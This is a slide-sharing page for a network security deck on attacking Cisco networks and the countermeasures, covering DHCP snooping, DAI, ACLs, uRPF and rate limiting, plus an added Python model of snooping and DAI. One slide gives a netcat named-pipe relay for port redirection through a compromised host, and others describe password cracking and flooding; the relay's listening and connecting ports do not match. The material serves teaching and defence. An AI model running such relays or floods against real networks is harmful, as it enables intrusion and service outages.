(Diagram: client, rogue DHCP server run by the attacker, and the legitimate DHCP server on the same segment.)
Everything starts with starvation: the attacker first floods DISCOVERs from random MAC addresses to exhaust the legitimate server's address pool, so that only the rogue server still has leases to hand out.
Storm control can help, since those requests are broadcasts:
interface FastEthernet0/1
 storm-control broadcast level 10.00 8.00
This suppresses broadcasts on the port once they exceed 10% of its bandwidth, until they fall back under 8%. It is a blunt instrument; port security (limiting the MAC addresses per port) or the DHCP snooping rate limit (ip dhcp snooping limit rate) address starvation more directly.
DHCP Snooping
– DHCP snooping allows the configuration of ports as trusted or untrusted.
• Trusted ports (uplinks and the port toward the legitimate DHCP server) may carry server messages: OFFER, ACK and NAK.
• Untrusted ports (client ports) can forward only client messages such as DISCOVER and REQUEST; a server reply arriving on an untrusted port is dropped.
– DHCP snooping enables the switch to build a DHCP binding table that maps a client MAC address, IP address, lease, VLAN, and port ID.
– Use the ip dhcp snooping command.
(Diagram: the rogue DHCP server's offer on an untrusted port is dropped, while the legitimate server's offer on the trusted port reaches the client.)
DHCP Snooping Configuration
ip dhcp snooping
ip dhcp snooping vlan 20
!
interface FastEthernet0/13
 switchport access vlan 20
 ip dhcp snooping trust
FastEthernet0/13 is the port toward the legitimate DHCP server; every other port in VLAN 20 stays untrusted by default.
Switch#show ip dhcp snooping binding
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:14:A8:96:2C:40   10.1.2.12        86371       dhcp-snooping  20    FastEthernet0/24
00:14:6A:1D:B8:00   10.1.2.13        86371       dhcp-snooping  20    FastEthernet0/23
Total number of bindings: 2
ARP Spoofing: Man-in-the-Middle Attacks
Hosts on the segment: A = host A (IP 10.1.1.2, MAC A.A.A.A); B = host B (IP 10.1.1.1, MAC B.B.B.B); C = the attacker (IP 10.1.1.3, MAC C.C.C.C).
1. Host A asks: what is the MAC for 10.1.1.1?
2. Legitimate ARP reply from B: 10.1.1.1 = MAC B.B.B.B
3. Subsequent gratuitous ARP replies from C overwrite the legitimate entries:
• ARP table in host A: 10.1.1.1 = MAC C.C.C.C
• ARP table in host B: 10.1.1.2 = MAC C.C.C.C
• ARP table in host C keeps the real mappings (10.1.1.1 = MAC B.B.B.B, 10.1.1.2 = MAC A.A.A.A), so C can forward the traffic it intercepts between A and B.
Result on the victims: 10.1.1.1 and 10.1.1.2 are both bound to C.C.C.C.
Mitigating Man-in-the-Middle Attacks with DAI
• MAC-to-IP tracking built on DHCP snooping
DAI provides protection against attacks such as ARP poisoning using spoofing tools such as ettercap, dsniff, and arpspoof.
DAI function:
1. Track the DHCP Discovery (broadcast) from the client.
2. Track the DHCP Offer (unicast) from the server and record the client's MAC-to-IP binding.
3. Track subsequent ARPs and check their MAC-to-IP pair against that binding.
(Diagram: client 10.1.1.2 broadcasting a DHCP Discovery; the DHCP server answering with a unicast Offer.)
DAI in Action
• A binding table containing IP-address and MAC-address associations is dynamically populated using DHCP snooping.
• The attacker sends a gratuitous ARP ("I am your gateway: 10.1.1.1") to attempt to change the IP-to-MAC bindings of the victims.
• The switch compares the ARP's sender MAC and IP with the binding table; the attacker's MAC is bound to its own leased address, not to 10.1.1.1, so the attacker is not the gateway according to the binding table and the ARP is dropped.
(Diagram: gateway 10.1.1.1, victim 10.1.1.2 and the attacker on the same VLAN.)
DAI Configuration…
ip arp inspection vlan 20
ip arp inspection vlan 20 logging dhcp-bindings all
ip arp inspection validate src-mac
Ports toward the gateway, other switches and the DHCP server need ip arp inspection trust, otherwise their ARP traffic (which has no DHCP binding) is dropped; hosts with static addresses need an ARP ACL entry. validate src-mac additionally drops ARP packets whose Ethernet source MAC differs from the ARP sender MAC.
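One model that covers both the DHCP snooping slides and DAI, added as an example for this page (not Cisco code and not the deck's own): a switch that accepts server messages only from trusted ports, drops client messages whose chaddr does not match the sending MAC, builds the binding table from ACKs, and then checks every ARP on untrusted ports against it. The MAC addresses, the 10.1.2.0/24 addresses and the port assignments mirror the binding table shown above but are constructed for the scenario.

```python
from dataclasses import dataclass, field

DHCP_CLIENT_MSGS = {"DISCOVER", "REQUEST", "DECLINE", "RELEASE", "INFORM"}
DHCP_SERVER_MSGS = {"OFFER", "ACK", "NAK"}


@dataclass
class SnoopingSwitch:
    """Model of one VLAN on an access switch with DHCP snooping and DAI enabled."""
    vlan: int
    trusted_ports: set
    validate_src_mac: bool = True
    bindings: dict = field(default_factory=dict)      # client MAC -> (IP, VLAN, port)
    client_ports: dict = field(default_factory=dict)  # client MAC -> port it was last seen on
    log: list = field(default_factory=list)

    def receive_dhcp(self, port, src_mac, msg, client_mac, yiaddr=None) -> str:
        """DHCP snooping: server messages only from trusted ports; client messages on
        untrusted ports must carry the sender's own MAC in chaddr (verify mac-address);
        an ACK arriving through a trusted port creates the binding for the client's port."""
        if msg in DHCP_SERVER_MSGS and port not in self.trusted_ports:
            self.log.append(f"drop DHCP {msg} from {src_mac} on untrusted {port}: rogue server")
            return "drop"
        if msg in DHCP_CLIENT_MSGS and port not in self.trusted_ports and client_mac != src_mac:
            self.log.append(f"drop DHCP {msg} on {port}: chaddr {client_mac} != source {src_mac}")
            return "drop"
        if msg in DHCP_CLIENT_MSGS:
            self.client_ports[client_mac] = port
        if msg == "ACK" and client_mac in self.client_ports:
            self.bindings[client_mac] = (yiaddr, self.vlan, self.client_ports[client_mac])
        if msg == "RELEASE":
            self.bindings.pop(client_mac, None)
        return "forward"

    def receive_arp(self, port, src_mac, sender_mac, sender_ip) -> str:
        """DAI: ARP on untrusted ports is forwarded only when (sender MAC, sender IP, port)
        matches a snooping binding; 'validate src-mac' also requires the Ethernet source
        to equal the ARP sender MAC."""
        if port in self.trusted_ports:
            return "forward"
        if self.validate_src_mac and src_mac != sender_mac:
            self.log.append(f"drop ARP on {port}: ethernet source {src_mac} != sender {sender_mac}")
            return "drop"
        binding = self.bindings.get(sender_mac)
        if binding is None or binding[0] != sender_ip or binding[2] != port:
            self.log.append(f"drop ARP on {port}: {sender_mac} claims {sender_ip}, binding is {binding}")
            return "drop"
        return "forward"


# Constructed scenario matching the deck: VLAN 20, DHCP server reached via FastEthernet0/13,
# host A on FastEthernet0/24, attacker on FastEthernet0/23. The MACs are made up.
HOST_A, ATTACKER, GATEWAY = "00:14:a8:96:2c:40", "00:14:6a:1d:b8:00", "00:00:0c:9f:f0:14"
SRV_PORT, A_PORT, ATK_PORT = "FastEthernet0/13", "FastEthernet0/24", "FastEthernet0/23"


def run_scenario():
    sw = SnoopingSwitch(vlan=20, trusted_ports={SRV_PORT})
    v = {}
    # Leases: host A gets 10.1.2.12, the attacker legitimately gets 10.1.2.13
    v["a_discover"] = sw.receive_dhcp(A_PORT, HOST_A, "DISCOVER", HOST_A)
    v["rogue_offer"] = sw.receive_dhcp(ATK_PORT, ATTACKER, "OFFER", HOST_A, "10.1.2.200")
    v["real_offer"] = sw.receive_dhcp(SRV_PORT, GATEWAY, "OFFER", HOST_A, "10.1.2.12")
    v["a_ack"] = sw.receive_dhcp(SRV_PORT, GATEWAY, "ACK", HOST_A, "10.1.2.12")
    sw.receive_dhcp(ATK_PORT, ATTACKER, "DISCOVER", ATTACKER)
    sw.receive_dhcp(SRV_PORT, GATEWAY, "ACK", ATTACKER, "10.1.2.13")
    # Starvation attempt with a random chaddr but the attacker's real source MAC; a tool
    # that randomises the Ethernet source too gets past this check and is left to the
    # snooping rate limit or port security.
    v["starvation"] = sw.receive_dhcp(ATK_PORT, ATTACKER, "DISCOVER", "02:00:de:ad:be:ef")
    # ARP poisoning attempts, then legitimate ARP
    v["gw_spoof"] = sw.receive_arp(ATK_PORT, ATTACKER, ATTACKER, "10.1.2.1")      # "I am your gateway"
    v["host_spoof"] = sw.receive_arp(ATK_PORT, ATTACKER, ATTACKER, "10.1.2.12")   # claims host A's IP
    v["mac_spoof"] = sw.receive_arp(ATK_PORT, ATTACKER, GATEWAY, "10.1.2.1")      # forged ARP sender MAC
    v["attacker_own"] = sw.receive_arp(ATK_PORT, ATTACKER, ATTACKER, "10.1.2.13")
    v["host_a_own"] = sw.receive_arp(A_PORT, HOST_A, HOST_A, "10.1.2.12")
    v["gateway_reply"] = sw.receive_arp(SRV_PORT, GATEWAY, GATEWAY, "10.1.2.1")
    return v, sw.bindings, sw.log


if __name__ == "__main__":
    verdicts, bindings, log = run_scenario()
    print(verdicts, bindings, *log, sep="\n")
```

The trusted uplink is what makes the gateway's own ARP pass, which is the reason the DAI configuration above needs ip arp inspection trust on that port; every poisoning attempt from the attacker's port fails because its only binding is 10.1.2.13.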
Questions & Discussion
Thank you…

More Related Content

What's hot

Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08DallasHaselhorst
 
Network Security
Network SecurityNetwork Security
Network SecurityMAJU
 
Network security
Network securityNetwork security
Network securityEstiak Khan
 
Access Control Presentation
Access Control PresentationAccess Control Presentation
Access Control PresentationWajahat Rajab
 
Secure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsSecure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsEoin Woods
 
Malicious software and software security
Malicious software and software  securityMalicious software and software  security
Malicious software and software securityG Prachi
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackAhmed Ghazey
 
Session Hijacking ppt
Session Hijacking pptSession Hijacking ppt
Session Hijacking pptHarsh Kevadia
 
Intrusion Detection And Prevention
Intrusion Detection And PreventionIntrusion Detection And Prevention
Intrusion Detection And PreventionNicholas Davis
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeIkhtiar Khan Sohan
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamMohammed Adam
 
Operating system security
Operating system securityOperating system security
Operating system securityRamesh Ogania
 

What's hot (20)

Denial of service
Denial of serviceDenial of service
Denial of service
 
Dos attack
Dos attackDos attack
Dos attack
 
Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08
 
Network Security
Network SecurityNetwork Security
Network Security
 
Network security
Network securityNetwork security
Network security
 
Access Control Presentation
Access Control PresentationAccess Control Presentation
Access Control Presentation
 
Security threats
Security threatsSecurity threats
Security threats
 
Secure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsSecure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of Us
 
Malicious software and software security
Malicious software and software  securityMalicious software and software  security
Malicious software and software security
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
Session Hijacking ppt
Session Hijacking pptSession Hijacking ppt
Session Hijacking ppt
 
Firewalls
FirewallsFirewalls
Firewalls
 
Intrusion Detection And Prevention
Intrusion Detection And PreventionIntrusion Detection And Prevention
Intrusion Detection And Prevention
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and Challenge
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by Adam
 
Operating system security
Operating system securityOperating system security
Operating system security
 

Viewers also liked

Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windowsdkaya
 
Sniffing SSL Traffic
Sniffing SSL TrafficSniffing SSL Traffic
Sniffing SSL Trafficdkaya
 
Mitigating Layer2 Attacks
Mitigating Layer2 AttacksMitigating Layer2 Attacks
Mitigating Layer2 Attacksdkaya
 
Cisco Switch Security
Cisco Switch SecurityCisco Switch Security
Cisco Switch Securitydkaya
 
Module 1 introduction to Linux
Module 1 introduction to LinuxModule 1 introduction to Linux
Module 1 introduction to LinuxTushar B Kute
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacksdkaya
 
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.Sumutiu Marius
 
Mastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installationMastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installationnetworkershome
 
Microsoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 SecurityMicrosoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 Securitydkaya
 
Understanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NATUnderstanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NATCisco Russia
 
Implementing Cisco AAA
Implementing Cisco AAAImplementing Cisco AAA
Implementing Cisco AAAdkaya
 
Web Security Deployment
Web Security DeploymentWeb Security Deployment
Web Security DeploymentCisco Canada
 
Avaya Networking Solution Overview
Avaya Networking Solution OverviewAvaya Networking Solution Overview
Avaya Networking Solution OverviewMotty Ben Atia
 
Implementing 802.1x Authentication
Implementing 802.1x AuthenticationImplementing 802.1x Authentication
Implementing 802.1x Authenticationdkaya
 
Check point presentation june 2014
Check point presentation june 2014Check point presentation june 2014
Check point presentation june 2014David Berkelmans
 
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Cisco Russia
 
Cisco ASA Firepower
Cisco ASA FirepowerCisco ASA Firepower
Cisco ASA FirepowerAnwesh Dixit
 

Viewers also liked (20)

Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windows
 
Sniffing SSL Traffic
Sniffing SSL TrafficSniffing SSL Traffic
Sniffing SSL Traffic
 
Mitigating Layer2 Attacks
Mitigating Layer2 AttacksMitigating Layer2 Attacks
Mitigating Layer2 Attacks
 
Cisco Switch Security
Cisco Switch SecurityCisco Switch Security
Cisco Switch Security
 
Attacks
AttacksAttacks
Attacks
 
Module 1 introduction to Linux
Module 1 introduction to LinuxModule 1 introduction to Linux
Module 1 introduction to Linux
 
Presentation1
Presentation1Presentation1
Presentation1
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacks
 
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
 
Mastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installationMastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installation
 
Microsoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 SecurityMicrosoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 Security
 
Understanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NATUnderstanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NAT
 
Implementing Cisco AAA
Implementing Cisco AAAImplementing Cisco AAA
Implementing Cisco AAA
 
Web Security Deployment
Web Security DeploymentWeb Security Deployment
Web Security Deployment
 
Avaya Networking Solution Overview
Avaya Networking Solution OverviewAvaya Networking Solution Overview
Avaya Networking Solution Overview
 
Implementing 802.1x Authentication
Implementing 802.1x AuthenticationImplementing 802.1x Authentication
Implementing 802.1x Authentication
 
Checkpoint r77
Checkpoint r77Checkpoint r77
Checkpoint r77
 
Check point presentation june 2014
Check point presentation june 2014Check point presentation june 2014
Check point presentation june 2014
 
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
 
Cisco ASA Firepower
Cisco ASA FirepowerCisco ASA Firepower
Cisco ASA Firepower
 

Similar to Hacking Cisco Networks and Countermeasures

lecture5.pptx
lecture5.pptxlecture5.pptx
lecture5.pptxLlobarro2
 
Lecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptxLecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptxAsmaaLafi1
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITYVinil Patel
 
DDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL LeeDDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL LeeMyNOG
 
Vulnerabilities in IP Protocols
Vulnerabilities in IP ProtocolsVulnerabilities in IP Protocols
Vulnerabilities in IP Protocolsbabak danyal
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Pathshibaehed
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.pptjepoy808
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.pptanakorang28
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.pptsumita02
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigationsMukesh Chaudhari
 
Defcon 16-pilosov-kapela
Defcon 16-pilosov-kapelaDefcon 16-pilosov-kapela
Defcon 16-pilosov-kapelaHai Nguyen
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptcemporku
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdftehkotak4
 

Similar to Hacking Cisco Networks and Countermeasures (20)

Hacking Cisco
Hacking CiscoHacking Cisco
Hacking Cisco
 
vulnerabilities in IP.pdf
vulnerabilities in IP.pdfvulnerabilities in IP.pdf
vulnerabilities in IP.pdf
 
lecture5.pptx
lecture5.pptxlecture5.pptx
lecture5.pptx
 
Lecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptxLecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptx
 
26 security2
26 security226 security2
26 security2
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
 
DDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL LeeDDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL Lee
 
Vulnerabilities in IP Protocols
Vulnerabilities in IP ProtocolsVulnerabilities in IP Protocols
Vulnerabilities in IP Protocols
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigations
 
Defcon 16-pilosov-kapela
Defcon 16-pilosov-kapelaDefcon 16-pilosov-kapela
Defcon 16-pilosov-kapela
 
Network security
Network securityNetwork security
Network security
 
Security attacks
Security attacksSecurity attacks
Security attacks
 
Isys20261 lecture 07
Isys20261 lecture 07Isys20261 lecture 07
Isys20261 lecture 07
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
 
Attack.pptx
Attack.pptxAttack.pptx
Attack.pptx
 

Hacking Cisco Networks and Countermeasures

  • 1. Hacking Cisco Networks and Countermeasures
  • 2. Overview • Reconnaissance Attacks – Passive Sniffing – Ping Sweeps – Port Scans (tcp&udp) • Active Attacks – Password attacks – Trust exploitation – Port redirection • External Attacks – IP Spoofing – DoS, DDoS Attacks • Internal Attacks – DHCP and ARP Attacks
  • 3. Reconnaissance Attacks • Reconnaissance refers to the overall act of learning information about a target network by using readily available information and applications. • Reconnaissance attacks include these attacks: – Packet sniffers – Port scans – Ping sweeps – Internet information queries
  • 4. Packet Sniffers • A packet sniffer is a software application that uses a network adapter card in promiscuous mode to capture all network packets. There are packet sniffer features: – Packet sniffers exploit information passed in clear text. Protocols that pass information in clear text are Telnet, FTP, SNMP, Post Office Protocol (POP), and HTTP. – Packet sniffers must be on the same collision domain as the machine that they are targeting. – Packet sniffers can be used legitimately or can be designed specifically for attack. Host A Host B Router A Router B
  • 6. Packet Sniffer Attack Mitigation • Here are some packet sniffer mitigation techniques and tools: – Authentication – Switched infrastructure – Antisniffer tools – Cryptography Host A Host B Router A Router B
  • 7. Port Scans and Ping Sweeps • Port scan and ping sweep attacks: – Identify all services on the network – Identify all hosts and devices on the network – Identify the operating systems on the network – Identify vulnerabilities on the network
  • 10. Blocking Ping Sweeps access-list 102 deny icmp any any echo access-list 102 permit ip any any interface FastEthernet0/0 ip address 10.1.1.254 255.255.255.0 ip access-group 102 in
  • 11. Seems like it worked but ???
  • 12. We give out too much information…
  • 13. To block messages originating from the blocking router… access-list 103 permit icmp any any unreachable class-map match-all STOPSHARING match access-group 103! policy-map STOPSHARING class STOPSHARING drop class class-default control-plane service-policy output STOPSHARING
  • 15. But this time we don’t share info…
  • 18. How to block… access-list 101 deny icmp any any unreachable access-list 101 permit ip any any interface FastEthernet0/0 ip address 10.1.1.254 255.255.255.0 ip access-group 101 out
  • 19. We don’t send any unreachable messages…
  • 20. After Blocking everything seems open, some obscurity for scanner…
  • 21. • Port scans and ping sweeps cannot be prevented without compromising network capabilities. Port Scan and Ping Sweep Attack Mitigation However, damage can be mitigated using IPS at the network and host levels. Workstation with HIPS Laptop with HIPS Scan Port Shared Connection IDS and IPS
  • 22. Internet Information Queries • Sample IP address query Attackers can use Internet tools such as whois as a weapon.
  • 23. Access Attacks • Intruders use access attacks on networks or systems for the these reasons: – Retrieve data – Gain access – Escalate their access privileges • Access attacks include: – Password attacks – Trust exploitation – Port redirection
  • 24. Password Attacks • Hackers implement password attacks using: – Brute-force attacks – Trojan horse programs – IP spoofing – Packet sniffers
  • 25. Password Attack Example – The bgp_md5crack tool is used for cracking a secret used for RFC2385 based packet signing and authentication. It is designed for offline cracking, means to work on a sniffed, correct signed packet. This packet can either be directly sniffed of the wire or be provided in a pcap file.
  • 28. Trust Exploitation – A hacker leverages existing trust relationships. – Several trust models exist: • Microsoft Windows: – Domains – Active directory • Linux and UNIX: – NIS – NIS+ System A User = psmith; Pat Smith System B is compromised by a hacker. User = psmith; Pat Smith Hacker User = psmith; Pat Smithson A hacker gains access to System A . Trust relationships: • System A trusts System B. • System B trusts everyone. • System A trusts everyone.
  • 29. Port Redirection Host B Attacker Source: A Destination: B Port: 23 Compromised Host A Source: Attacker Destination: A Port: 22 Source: Attacker Destination: B Port: 23
  • 30. Port Redirection Configuration On HOSTA we create a named pipe using the mkfifo commands: #pipe will be the name of our named pipe mkfifo pipe We then create our two way tunnel using Netcat on HOSTA: nc -lvp 25 <pipe | nc -t 10.1.2.253 23 >pipe Then telnet from Attacker machine telnet 10.1.2.1 80
  • 31. Here we are connected to the internal switch…
  • 32. IP Spoofing – IP spoofing occurs when a hacker inside or outside a network impersonates a trusted source. – IP spoofing uses trusted internal IP addresses or trusted external IP addresses. – Attackers use IP spoofing for many reasons: • To gain root access • To inject malicious data or commands into an existing data stream • To divert network packets to the hacker who can then reply as a trusted user by changing the routing tables • To crash servers by overloading memory (DoS) • As a step in a larger attack
  • 33. IP Spoofing—Types of Attack •IP spoofing attacks are either: – Nonblind spoofing • The attacker sniffs sequence numbers (i.e., from inside the subnet of the victim). – Blind spoofing • The attacker calculates sequence numbers. •IP spoofing can lead to these types of attacks: – Man-in-the-middle attack – DoS attack – Distributed DoS (DDoS) attack
  • 34. Let’s see in action
  • 35. Here we drive router to reply to the other host..
  • 36. Man-in-the-Middle Attacks
  – A man-in-the-middle attack requires that the hacker has access to network packets that come across a network.
  – A man-in-the-middle attack is implemented using the following:
    • Network packet sniffers (nonblind attack)
    • Routing and transport protocols (blind attack)
  (Figure: Host A, Router A, Router B, Host B; data in clear text)
  • 37. IP Spoofing Attack Mitigation
  • The threat of IP spoofing can be reduced, but not eliminated, using these measures:
    – Strong access control at the router
      • ACLs on the outbound interface
      • ACLs on the inbound interface
    – Data encryption
    – Additional authentication requirements
  (Figure: Host A, Router A, ISP, Router B, Host B, with an IPsec tunnel between the routers)
  • 38. DoS Attacks
  • A DoS attack damages or corrupts your computer system or denies you and others access to your networks, systems, or services.
  • DoS attack techniques almost always use IP spoofing.
  • 39. TCP SYN Flooding DoS Attack
  (Figure, top: a normal TCP three-way handshake between a TCP client using client ports 1024–65535 and a TCP server on service port 80: 1. SYN, 2. SYN and ACK, 3. ACK)
  (Figure, bottom: the attacker's TCP client sends 1. SYN with a spoofed source address; the victim server answers 2. SYN and ACK to the spoofed address, and the final ACK is shown as "?" because it never arrives)
  • 40. DDoS Attacks
  • DoS and DDoS attacks have these characteristics:
    – They are not generally targeted to gain access.
    – They aim at making a service unavailable.
    – They require very little effort to execute.
    – They are difficult to eliminate.
  (Figure: a DoS attack, attacker directly to victim; a DDoS attack, attacker to an attack control mechanism to several zombies to the victim)
  • 41. DDoS Example
  1. The cracker looks for targets.
  2. The cracker installs software to scan, compromise, and infect agents with zombies.
  3. Agents are loaded with remote control attack software.
  4. The client issues commands to handlers that control agents in a mass attack.
  (Figure: client system, handler systems, agent systems)
  • 43. Let’s be more creative…
  • 44. We put almost 1 million packets on the wire in a one-minute period, not so bad…
  • 46. DoS and DDoS Attack Mitigation
  • Reduce DoS and DDoS attacks by:
    – Protecting yourself against IP spoofing with ingress- and egress-filtering ACLs
    – Using antivirus software to find zombie agents
    – Using anti-DoS features on routers and firewalls
      • The ip verify unicast reverse-path interface command
      • ACLs to filter all private Internet address space (RFC 1918)
    – Using traffic rate limiting at the ISP level
      • Use class-based traffic policing on ICMP packets
      • Use SYN rate limiting
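The ingress/egress filtering, RFC 1918 and uRPF checks listed above, modelled in Python as an added example (not from the slides). The routing table and interface names are constructed; strict uRPF is modelled as "the source address must route back out the interface the packet arrived on", which is what ip verify unicast reverse-path enforces.

```python
import ipaddress

# RFC 1918 private address space: must never arrive from the Internet side.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed routing table for the example: prefix -> egress interface.
ROUTES = {
    ipaddress.ip_network("10.1.1.0/24"): "Fa0/0",   # inside LAN
    ipaddress.ip_network("10.1.2.0/24"): "Fa0/1",   # second inside LAN
    ipaddress.ip_network("0.0.0.0/0"):   "Se0/0",   # default route toward the ISP
}
INTERNET_IFACE = "Se0/0"


def lookup(ip):
    """Longest-prefix match: the interface a packet destined to `ip` would leave on."""
    best = None
    for net, iface in ROUTES.items():
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1]


def rpf_check(src, in_iface):
    """Strict uRPF: the source must be reachable back out the arrival interface."""
    return lookup(src) == in_iface


def decide(src_ip, in_iface):
    """Return (verdict, reason) for a packet with source src_ip arriving on in_iface."""
    src = ipaddress.ip_address(src_ip)
    # Ingress filter on the ISP-facing interface: drop private source addresses.
    if in_iface == INTERNET_IFACE and any(src in n for n in RFC1918):
        return ("drop", "rfc1918-source-from-internet")
    # Egress filter on inside interfaces and uRPF everywhere: only sources that
    # belong behind the arrival interface may pass, so spoofed sources are dropped.
    if not rpf_check(src, in_iface):
        return ("drop", "urpf-failed")
    return ("permit", "ok")
```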
  • 47. Rate Limiting
  What rate limiting does:
  • Allows network managers to set bandwidth thresholds for users and by traffic type
  Benefits:
  • Prevents the deliberate or accidental flooding of the network
  • Keeps traffic flowing smoothly
  (Figure: rate limiting for different classes of users, network manager, teachers and students, with thresholds of 2 Mbps, 10 Mbps and 50 Mbps)
  Otherwise, there can be a deliberate or accidental slowdown or freezing of the network.
  • 48. Example: ICMP rate limiting
  access-list 170 permit icmp any any
  interface f0/0
   rate-limit input access-group 170 128000 16000 24000 conform-action transmit exceed-action drop
